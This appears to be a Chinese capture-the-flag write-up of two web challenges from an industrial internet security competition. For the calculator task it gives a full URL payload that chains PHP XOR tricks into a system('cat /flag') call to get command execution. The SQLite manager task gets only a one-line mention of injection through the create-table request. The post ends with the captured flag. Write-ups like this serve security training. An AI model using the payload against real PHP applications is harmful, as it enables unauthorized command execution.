全国工业互联网安全技术技能大赛部分wp

文章来源:EDI安全

01

web题 SimpleCalculator

题目:简单的计算器

全国工业互联网安全技术技能大赛部分wp

进去后发现flag.php计算功能可绕过执行shell

http://eci-2zei447jhyte2gq76fli.cloudeci1.ichunqiu.com/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag

得到flag

全国工业互联网安全技术技能大赛部分wp

02

web题SQLManager

题目:简易的SQLite管理器

全国工业互联网安全技术技能大赛部分wp

这题存在注入在建表包注入


全国工业互联网安全技术技能大赛部分wp

获得表名,表列

全国工业互联网安全技术技能大赛部分wp

然后获得flag

全国工业互联网安全技术技能大赛部分wp

flag{914162a9-5a2e-4b80-9d74-93c119a3ef86}

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容